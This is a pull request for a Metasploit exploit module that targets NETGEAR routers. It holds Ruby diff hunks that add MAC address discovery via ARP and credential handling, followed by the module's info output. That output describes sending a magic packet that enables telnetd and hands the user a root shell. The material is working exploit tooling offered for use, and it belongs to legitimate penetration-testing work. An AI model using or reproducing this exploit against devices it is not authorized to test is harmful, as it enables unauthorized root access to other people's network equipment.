     # Detect TCP or UDP and presence of telnetd
     @proto = target[:proto]
     detect_proto if @proto == :auto
+
+    # Use supplied or ARP-cached MAC address
+    configure_mac if @do_exploit
 
     # Use supplied or default creds
     configure_creds if @do_exploit
@@ -120,6 +124,29 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def configure_mac
+    @mac = datastore['MAC']
+
+    return if @mac
+
+    print_status('Attempting to discover MAC address via ARP')
+
+    begin
+      open_pcap
+      @mac = lookup_eth(rhost).first
+    rescue RuntimeError
+      fail_with(Failure::BadConfig, 'Superuser access required')
+    ensure
+      close_pcap
+    end
+
+    if @mac
+      print_good("Found MAC address #{@mac}")
+    else
+      fail_with(Failure::Unknown, 'Could not find MAC address')
+    end
+  end
+
   def configure_creds
     @username = datastore['USERNAME'] || target[:username]
     @password = datastore['PASSWORD'] || target[:password]
@@ -136,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit_telnetenabled
     print_status('Generating magic packet')
-    payload = magic_packet(datastore['MAC'], @username, @password)
+    payload = magic_packet(@mac, @username, @password)
 
     begin
       print_status("Connecting to telnetenabled via #{@proto.upcase}")

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -100,6 +100,9 @@ class MetasploitModule < Msf::Exploit::Remote
       @password = tgt[:password]
     end
 
+    # Tell the user what creds we chose
+    vprint_status("Using creds #{@username}:#{@password}") if do_exploit
+
     # Shell it
     exploit_telnetenabled if do_exploit
     connect_telnetd

--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -77,7 +77,13 @@ class MetasploitModule < Msf::Exploit::Remote
       begin
         connect
 
-        if sock.get_once.length == 0
+        res = begin
+          sock.get_once || ''
+        rescue EOFError
+          ''
+        end
+
+        if res.length == 0
           print_good('Detected telnetenabled on TCP')
         else
           print_good('Detected telnetd on TCP')


### PR DESCRIPTION
Five years in the making...

```
msf5 exploit(linux/telnet/netgear_telnetenable) > info

       Name: NETGEAR TelnetEnable
     Module: exploit/linux/telnet/netgear_telnetenable
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-10-30

Provided by:
  Paul Gebheim
  insanid
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic (detect TCP or UDP)
  1   TCP (typically older devices)
  2   UDP (typically newer devices)

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILTER                      no        The filter string for capturing traffic
  INTERFACE                   no        The name of the interface
  MAC                         no        MAC address of device
  PASSWORD                    no        Password on device
  PCAPFILE                    no        The name of the PCAP capture file to process
  RHOST                       yes       The target address
  RPORT      23               yes       The target port (TCP)
  SNAPLEN    65535            yes       The number of bytes to capture
  TIMEOUT    500              yes       The number of seconds to wait for new data
  USERNAME                    no        Username on device

Payload information:

Description:
  This module sends a magic packet to a NETGEAR device to enable
  telnetd. Upon successful connect, a root shell should be presented
  to the user.

References:
  https://wiki.openwrt.org/toh/netgear/telnet.console
  https://github.com/cyanitol/netgear-telenetenable
  https://github.com/insanid/netgear-telenetenable

msf5 exploit(linux/telnet/netgear_telnetenable) >
```

- [x] Test with TCP
- [x] Test with UDP
- [x] Test with automatic targeting